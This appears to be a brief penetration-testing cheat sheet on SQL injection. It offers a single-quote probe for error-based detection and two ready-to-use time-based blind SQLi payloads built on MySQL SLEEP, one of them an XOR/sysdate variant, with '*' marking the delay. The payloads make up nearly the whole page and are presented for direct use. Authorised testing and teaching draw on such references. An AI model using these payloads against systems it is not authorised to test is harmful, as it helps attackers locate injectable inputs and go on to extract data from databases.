# SQL injection

## Error-based SQLi

**`' - Single quote (`apostrophe sign`)`**

## Time-based SQLi

> <mark style="color:red;background-color:blue;">**\* is replaced with any seconds**</mark>

```
(SELECT(0)FROM(SELECT(SLEEP(*)))a)
```

```
0'XOR(if(now()=sysdate(),sleep(*),0))XOR’Z
```